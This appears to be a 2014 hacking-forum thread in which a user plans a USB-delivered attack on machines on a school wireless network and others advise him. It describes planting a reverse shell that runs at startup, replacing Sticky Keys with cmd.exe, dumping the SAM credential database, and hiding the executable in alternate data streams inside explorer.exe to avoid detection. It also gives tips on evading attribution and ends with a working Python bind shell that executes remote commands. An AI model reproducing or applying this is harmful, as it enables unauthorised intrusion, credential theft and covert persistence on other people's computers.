EvilZone
Programming and Scripting => Projects and Discussion => : DeXtreme June 12, 2014, 08:16:23 PM
-
Heya fellas, I was thinking about writing script,probably batch, which when run will:
1.Copy a reverse-shell executable(written in python) to the host and make it run at startup
2.Replace the Sticky keys application with a cmd.exe
3.Dump the SAM database
4.Save a rough directory listing of folders like My Documents etc
And whole lot of other stuff i'm yet to think of.
Loaded on a USB stick. I'll have to run it myself of course but is there a way to automate it?
-
Is this what you're looking for? http://www.samlogic.net/articles/autorun-usb-flash-drive.htm
-
This is what he's looking for: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/
Autorun is dead, forget about it. HID is the future.
Python reverse shell sounds ridiculous. A regular user won't have python installed and on linux it can just be blocked. I'd go for netcat or at least a MSF generated reverse shell...
-
This is what he's looking for: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/
Autorun is dead, forget about it. HID is the future.
Python reverse shell sounds ridiculous. A regular user won't have python installed and on linux it can just be blocked. I'd go for netcat or at least a MSF generated reverse shell...
I was gonna compile the script to .exe with py2exe or pyinstaller. Plus i just wanted the feel of writing a reverse shell ;D I've been checking out HID but i'm not sure i can get the hardware. I'll continue reading up on it though
-
I was gonna compile the script to .exe with py2exe or pyinstaller. Plus i just wanted the feel of writing a reverse shell ;D I've been checking out HID but i'm not sure i can get the hardware. I'll continue reading up on it though
That will work, you could have the initial batch file save the py2exe generated directory(which contains the executable, some python c-modules and some .dlls for functionality) to the user's appdata/local(to hide) but you will need admin privileges to write registry keys for the startup process.
You don't need admin priveleges to copy to (C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>) which will achieve the same result as writing to the key in the registry. It will run when the user logs in. Right now I have a shortcut to the Rainmeter binary lurking in my startup folder.
Next have the batch file generate another .bat that points to your .exe in and save it to the startup folder previously mentioned and that SHOULD work.
Since you will be launching the batch file manually(at least for now), you will be able to start the batch file as admin and you can set things up a lot better. First off read this article about alternate data streams and you will see the potential for hiding your .exe even further. Imagine having your .exe hidden inside of another one, let's say explorer.exe.
The result will be that every time explorer.exe runs your binary will also run, inside the original process! This means it doesn't show in task manager, only the original explorer.exe shows in the list with slightly more memory usage than normal. I haven't tried this with explorer.exe but I know for a fact it works with other .exe's.
Read the attachment.
Also, here's a link for a cheap hid device.
https://www.pjrc.com/store/teensy31.html
Works with arduino IDE, with Teensyduino plugin available for free on the site in the link.
-
Thanks a lot frog. That's pretty useful stuff. Originally i planned on simply copying the files to the directories and editing the registry but your way sounds interesting. Plus the .exe in .exe info looks great. I'll be sure to look into it.
Gonna have to put a hold on the Teensy though. Ordering stuff from here is murder.
But thanks again. I'll keep y'all posted. ;D
-
I have Teensy2.0, it's kinda cheap and cool. Don't bother with the SDcard shield tho, it's useless.
py2exe for a reverse shell sounds like an overkill bro. There are plenty of example code to do it in C/++. Much better that way, and as I said before, there's always Netcat.
-
Thanks a lot frog. That's pretty useful stuff. Originally i planned on simply copying the files to the directories and editing the registry but your way sounds interesting. Plus the .exe in .exe info looks great. I'll be sure to look into it.
Gonna have to put a hold on the Teensy though. Ordering stuff from here is murder.
But thanks again. I'll keep y'all posted. ;D
No problem, just trying to keep the wheels turning.. Where are you at in the world? Just curious about your reasoning on ordering things.
-
I have Teensy2.0, it's kinda cheap and cool. Don't bother with the SDcard shield tho, it's useless.
py2exe for a reverse shell sounds like an overkill bro. There are plenty of example code to do it in C/++. Much better that way, and as I said before, there's always Netcat.
True.It would be better that way. However my original plan for the reverse shell was to connect back based on my MAC address. So regardless of my IP the shell can still find me. It's mainly for the WLAN at school. People log on and off so IPs aren't constant.
My C isn't that good either ;D so i thought I'd use Python as proof of concept. Maybe later code it in C.
What do you think?
No problem, just trying to keep the wheels turning.. Where are you at in the world? Just curious about your reasoning on ordering things.
Ghana..shipping isn't exactly a breezy down here and the rates are sky high.
-
I'd like to see how you will identify yourself in the world with just a MAC...
Python as a POC, yeah that sounds good. Tho I recommend to switch to C on normal basis.
-
I'd like to see how you will identify yourself in the world with just a MAC...
Python as a POC, yeah that sounds good. Tho I recommend to switch to C on normal basis.
If it's on an intranet(the LAN); no problem. Just use arp request packets to find the mac and corresponding IP.
I'm surprised how many people are from a different country than me on this site. I like it.
-
Yeah it's on LAN.WLAN to be exact.I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet. Then connecting via Socket with that. Only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.
-
Yeah it's on LAN.WLAN to be exact.I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet. Then connecting via Socket with that. Only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.
There are other packet capture and packet decoding/encoding for python. Here's a couple. You might have to have specific version of Python though.
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
https://code.google.com/p/dpkt/
Problem is there's not a ton of documentation for these modules.
You could also craft the RARP request from scratch using raw sockets, but I think I found what you are looking for; this library can craft RARP packets:
https://pypi.python.org/pypi/arp/1.0
-
Yeah it's on LAN.WLAN to be exact.I read up on ARP requests and it looks like it's only good for looking up the MAC address with the IP. The opposite is RARP but it seems it's not activated by default. I was planning on sending a SYN packet with my MAC using Scapy and reading the IP from the ACK packet. Then connecting via Socket with that. Only problem is downloading all the files needed to run Scapy on Windows. The sites seem to be down from here.
You are making this very difficult on yourself, I suggest reading up a bit on TCP/IP
-
There are other packet capture and packet decoding/encoding for python. Here's a couple. You might have to have specific version of Python though.
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
https://code.google.com/p/dpkt/
Problem is there's not a ton of documentation for these modules.
You could also craft the RARP request from scratch using raw sockets, but I think I found what you are looking for; this library can craft RARP packets:
https://pypi.python.org/pypi/arp/1.0
Cool. Thanks again frog.
You are making this very difficult on yourself, I suggest reading up a bit on TCP/IP
;D Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;
Instead of using MAC, could i just query the network's DNS server with my computer name?
-
do you have any plans of concealing your identity? With your current plan it'd be pretty trivial to track you down. and with plans to put your real, static IP AND Hostname in the logs your screwed if anyone gets smart and realizes they were hacked. I suggest putting some thought into anonymity. I won't tell you how, but do some research and be creative ;)
If you want to hack in todays world, covering your tracks is probably the most important thing you can do. otherwise you probably won't be hacking for very long
-
Cool. Thanks again frog.
;D Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;
Instead of using MAC, could i just query the network's DNS server with my computer name?
Np dude, I help where I can. You can make requests to local dns servers for IP addresses but the server will log this and if you try spoofing dns replies depending on their dns server daemon they will be warned of it(mail, logs, w/e). I like the idea of using rarp better. link-layer vs. application-layer?
-
Cool. Thanks again frog.
;D Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;
Instead of using MAC, could i just query the network's DNS server with my computer name?
Well you said that you will be using it on a WLAN mostly which is not much different from something a regular LAN.
Using a fixed IP address is by far the easiest, very often sys admins tend to specify a DHCP pool from a certain starting point to an endpoint , any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough :P
Since you are on the same LAN and we we wont have to bothered with things like NAT and other network horrors there is also no real reason to use a reverse connection , you can in this case flip the model and use the clients as servers.
Having them open a specific port and fetch the data yourself, this way they dont depend on a server on the network thus less things to go wrong.
Another idea might be to use mere force, in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from 0-254.
Within milliseconds it will hit the server and a connection is established.
Perhaps using things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do :))
-
Well you said that you will be using it on a WLAN mostly which is not much different from something a regular LAN.
Using a fixed IP address is by far the easiest, very often sys admins tend to specify a DHCP pool from a certain starting point to an endpoint , any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough :P
Since you are on the same LAN and we we wont have to bothered with things like NAT and other network horrors there is also no real reason to use a reverse connection , you can in this case flip the model and use the clients as servers.
Having them open a specific port and fetch the data yourself, this way they dont depend on a server on the network thus less things to go wrong.
Another idea might be to use mere force, in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from 0-254.
Within milliseconds it will hit the server and a connection is established.
Perhaps using things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do :))
True. Those could work but if remember correctly i tried assigning my own IP address and my laptop just plain refused to connect to the WLAN(What do you think could have caused that?). The networks i plan on using have little or no network monitoring so i'm taking advantage of that to be a little lose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here(Yay for me ;D) I think i'll write a different script for each method, just for the sake of learning.
-
True. Those could work but if remember correctly i tried assigning my own IP address and my laptop just plain refused to connect to the WLAN(What do you think could have caused that?). The networks i plan on using have little or no network monitoring so i'm taking advantage of that to be a little lose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here(Yay for me ;D) I think i'll write a different script for each method, just for the sake of learning.
On what OS was that ?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig, dont forget to add a route with route add.
I seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free so there wont be any conflicts.
Or fire up netdiscover before assigning an address, that way you will have a nice overview of the current pool connected to the AP, this will in turn give you all the MAC addresses on the network aswell it also does lookups for vendors which allow you to quickly pick out the phones etc etc.
-
On what OS was that ?
The way I know works is by using wpa_supplicant and just assigning a static IP with ifconfig, dont forget to add a route with route add.
I seen many GUI tools fucking that up.
The clean way to do it would be to see if arping responds on a certain IP address to make sure it is free so there wont be any conflicts.
Or fire up netdiscover before assigning an address, that way you will have a nice overview of the current pool connected to the AP, this will in turn give you all the MAC addresses on the network aswell it also does lookups for vendors which allow you to quickly pick out the phones etc etc.
Kali Linux. I used the Networking GUI. Wasn't conversant with using the CLI then so you're probably right.
Okay so I read up and wrote this script.Pretty simple really.Wrote it so to use it, first thing you have to send is the KEY. I'll write it in C next.
TODO:
Keep track of current directory
All suggestions are welcome ;D
import socket,subprocess
#create socket
s=socket.socket()
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
#open port 5052 and listen for connections
s.bind(("",5052))
s.listen(5)
while 1:
#accept connections
con,addr=s.accept()
con.settimeout(2000.0)
#recieve the key
key=con.recv(1024)
while con and key=="XXX":
try:
#recieve command
cmd=con.recv(1024)
#execute command
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out,err=proc.communicate()
#send output
con.send(out+err)
except:
con.close()
key=""
break